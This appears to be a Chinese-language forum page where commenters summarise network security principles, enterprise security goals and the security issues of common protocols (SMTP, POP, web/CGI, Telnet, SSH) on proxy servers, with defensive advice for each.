    系統安全鏈的強度取決于系統連接的最薄弱環節的安全態勢。防火墻的堅固程度取決于它最薄弱點的堅固程度。侵襲者通常是找出系統中最弱的一個點并集中力量對其進行攻擊。系統管理人員應該意識到網絡系統防御中的弱點,以便采取措施進行加固或消除它們的存在,同時也要監測那些無法消除的缺陷的安全態勢,對待安全的各個方面要同樣重視而不能有所偏重。

    失效保護原則

    安全保護的另一個基本原則就是失效保護原則。一旦系統運行錯誤,當其發生故障必須拒絕侵襲者的訪問,更不允許侵襲者跨人內部網絡。當然也存在一旦出現故障,可能導致合法用戶也無法使用信息資源的情況,這是確保系統安全必須付出的代價。

    普遍參與原則

    為了使安全機制更為有效,絕大部分安全系統要求員工普遍參與,以便集思廣益來規劃網絡的安全體系和安全策略,發現問題,使網絡系統的安全設計更加完善。一個安全系統的運行需要全體人員共同維護。

    防御多樣化原則

    像通過使用大量不同的系統提供縱深防御而獲得額外的安全保護一樣,也能通過使用大量不同類型、不同等級的系統得到額外的安全保護。如果配置的系統相同,那么只要知道如何侵入一個系統,也就會知道如何侵入所有的系統。

    簡單化原則

    簡單化作為安全保護策略有兩方面的含義:一是讓事物簡單便于理解;二是復雜化會為所有的安全帶來隱藏的漏洞,直接威脅網絡安全。

    動態化原則

    網絡信息安全問題是一個動態的問題,因此對安全需求和事件應進行周期化的管理,對安全需求的變化應及時反映到安全策略中去,并對安全策略的實施加以評審和審計。
    評論于 9個月前,獲得 0 個贊

    企業網絡系統安全應實現以下目標:

    • 全面監視對公開服務器的訪問,及時發現和拒絕不安全的操作和黑客攻擊行為。

    • 加強對各種訪問的審計工作,詳細記錄對網絡、公開服務器的訪問行為,形成完整的系統日志。

    • 將內部網絡、公開服務器網絡和外網進行有效隔離,避免與外部網絡的直接通信。

    • 建立網站各服務器的安全保護措施,保證網絡系統的安全。

    • 對于網絡上的內部重要信息應采用加密的方式存儲和傳輸。

    • 對網絡服務請求內容進行控制,使非法訪問在到達主機前被拒絕。

    • 加強合法用戶的訪問認證,同時將用戶的訪問權限控制在最低限度。

    • 強化系統備份,實現系統快速恢復。

    • 建立一套完整可行的網絡安全與網絡管理策略。

    評論于 11個月前,獲得 0 個贊

    通常代理服務器上使用以下協議:

    • SMTP協議:SMTP是用來處理服務器之間的郵件傳遞的。它是一個存儲轉發的系統,如果配置不當,很可能會成為垃圾郵件的轉發站。更可怕的是,服務器還有可能遭到郵件攻擊,導致系統的癱瘓。所以說,加強STMP協議安全是個不可小覷的問題。從安全的角度考慮,應不允許外部的SMTP服務器直接與內部SMTP服務器連接,目前,通常采用數據包過濾來限制外部主機與內部主機不能直接建立SMTP連接。

    • POP協議:POP是處理電子郵箱的客戶/服務器協議。存在的問題是,標準的POP客戶機和服務器以明文方式發送用戶口令,所以在網上竊聽的任何人都能捕獲到口令信息,并可以重新使用它,這樣代理服務器很容易受到入侵者的侵襲。要安全地提供POP服務,可以建立專門對外的POP代理服務器,限制外部用戶只能訪問專門對外的POP代理。

    • WWW服務:這幾乎是網絡上應用最為廣泛的信息服務。由于Web服務器必須運行外部程序,如交互式腳本或CGI等,用于對Web服務器發布的內容作動態修改。這樣侵襲者有可能將他自己的外部程序裝載到服務器上并哄騙該服務器運行它。在使用Web代理服務器時,應將對外和對內的服務分開,通過代理服務器的設置以及數據包過濾的辦法來限制外部用戶可以訪問的資源,來提高內部網絡的安全性。

    • Telnet協議:Telnet允許一個用戶遠程地執行另一個計算機上的命令外殼。由于Telnet發送的信息都是沒有加密的,很容易受到“嗅探”與“劫包”的侵襲。此外,被Telnet使用的命令外殼包含有系統管理的命令,一旦入侵者通過其他途徑獲得這些命令的使用權,就可以通過利用它們來破壞系統。

    • SSH協議:SSH由IETF的網絡小組所制定;SSH為建立在應用層基礎上的安全協議。SSH是較可靠,專為遠程登錄會話和其他網絡服務提供安全性的協議。利用SSH協議可以有效防止遠程管理過程中的信息泄露問題。SSH最初是UNIX系統上的一個程序,后來又迅速擴展到其他操作平臺。SSH在正確使用時可彌補網絡中的漏洞。SSH客戶端適用于多種平臺。幾乎所有UNIX平臺—包括HP-UX、Linux、AIX、Solaris、DigitalUNIX、Irix,以及其他平臺,都可運行SSH。

    6 聲望
    文章
    0
    粉絲
    0
    喜歡
    0
    亚洲 欧美 自拍 唯美 另类